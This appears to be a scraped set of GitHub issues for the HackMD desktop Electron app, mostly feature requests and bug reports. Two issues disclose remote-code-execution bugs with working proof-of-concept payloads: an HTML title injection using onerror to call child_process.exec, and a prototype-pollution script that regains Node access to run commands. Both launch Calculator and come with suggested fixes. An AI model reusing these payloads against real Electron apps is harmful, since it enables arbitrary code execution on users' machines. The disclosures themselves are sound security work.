hackmdio / hackmd-desktop Goto Github PK

I tried to run version 0.10 with macOS Version 10.15.7. After starting the program, I get the following error message:

Hyper 的 title bar 就是自製的，按鈕是 svg，可以參考一下：https://github.com/zeit/hyper/blob/master/lib/components/header.js

Menu item 就放到 popup menu 裡。

TODOs

• Custom titlebar a25de1f
  • goto home navigation
  • copy url
  • back/previous navigate
• menu actions 7fa597a
  • new window
  • login logout (uhh?)
  • new file
• Custom titlebar for Windows & Linux #2
• hide navbar ifi full screen on macOS
• configurable hackmd server url #7
• Copy url action in menu (or context menu) #8
• Open from url f0f123d
• Check server version 24c529a
• pin always on top 9aca856
• search keyboard shortcut not working (cmd/ctrl + f) 7bb62cb
• preserve last open file (documents)
• preserve each window state
• embedded pdf.js problem #5
• open app from browser (something like hackmd://)

Other Ideas

• Tab support
• fully customized red light #2
  • Also on other platforms, like Hyper.

Packages to try

• https://github.com/mixmaxhq/electron-editor-context-menu

Production checklist

• A new page to introduce our new toy ❤️
• Be added to electron app list
• Homebrew
• Icon
• release to store (TBD)

PDFObject is not working on electron.

There's a electron pdf.js example: https://github.com/seanchas116/electron-pdfjs

We can try to integrate pdf.js using electron webview api.

Or more aggressively, replace pdfobject package in hackmd.

Hi, first of all, thanks for your awesome program.

I'm currently using hackmd-desktop to take notes of a book in pdf.

So my workflow is to switch to the pdf viewer to change page and come back to hackmd. The issue here is that when the program regains focus it doesn't enter in edit mode or command mode (I'm using the vi layout). I have to click the window with the mouse so I can start using again the vi bindings.

If you use a tiling window manager (such as i3wm) it's a real bummer to have to reach the mouse just for that.

Is there any easy way to fix this?

Thank you!

Hi, I find a RCE in hackmd-desktop when viewing a evil note.

In renderer.js

webview.addEventListener('dom-ready', function () {
    // set webview title
    document.querySelector('#navbar-container .title').innerHTML = webview.getTitle()
    document.querySelector('title').innerHTML = webview.getTitle()
})

It will render the title of the webview in a privileged context.

If we use tag or a XSS(hackmdio/codimd#1233) to redirect to a evil page with a payload in title like this.

<head>
  <title><img src=1 onerror="process.mainModule.require('child_process').exec('open /Applications/Calculator.app')"></title>
</head>

It will execute the command in the payload and a calculator will pop up.

Hello,
Could you create a portable version for Windows based on @PortableApps format?
PortableApps is one of the best application suites for Windows out there.
It will be great for Windows users.

@2wayne, Any chance for assistance with that?

Thank You.

hackmd desktop use an old version of electron, in which we can use prototype pollution to get node ability back in webviews without nodeintegration.

poc:

<a href="http://127.0.0.1/gg.html">click me</a>

here is source code of gg.html

<script>
Function.prototype.call2=Function.prototype.call;
Function.prototype.call=function(...args){
    if(args[0]!=null && args[0]!=undefined && args[0].env!=undefined){
        Function.prototype.call=Function.prototype.call2;
        args[0].mainModule.require('child_process').exec('open -a Calculator');
        }
        return this.call2(...args)
}
location.reload();
</script>

when click on it we can get a Calculator on mac.

suggestions:

• open external links in system's browser
• update electron
• add contextisolation.

• Description
  • After installing HackMD desktop, I tried to open it and sign in with my GitHub account
  • The input cannot be clicked so that I cannot type my account
  • However, it can be worked when I turn the application into full-screen mode

It would be great to have an embedded HackMD server included so that we can edit offline/in our own sandbox, without needing to manually manage a HackMD server.

from electron/electron#573 (comment)

  mainWindow.webContents.session.webRequest.onHeadersReceived({}, (d, c) => {
    if(d.responseHeaders['x-frame-options'] || d.responseHeaders['X-Frame-Options']){
        delete d.responseHeaders['x-frame-options'];
        delete d.responseHeaders['X-Frame-Options'];
    }
    c({cancel: false, responseHeaders: d.responseHeaders});
  });

https://github.com/electron/update-electron-app

So far hackmd-desktop needs opening new windows to load another document.
Will hackmd team consider using the tab to open multiple files (remaining single window) in the future?
Thanks!

it would be great to have the ability to link to headings in the same doc with this mkd syntax
This would be great so that you can link to something without having the link open a new window.

When I using the download function, it exported all files as txt file. Could it export all notes to PDF fomart? So that it can keep the picture and layout in original view. Many thanks.

I downloaded version 0.10 and tried to use it, but I could not type Japanese.
Is this a bug? Or is it a specification that does not support Japanese input?

Usage Environment

• mac os 10.15.7

Sweet, I'm really excited about this, hackmd is my favorite editor.

Being able to load and edit local files would be my most desired feature for this.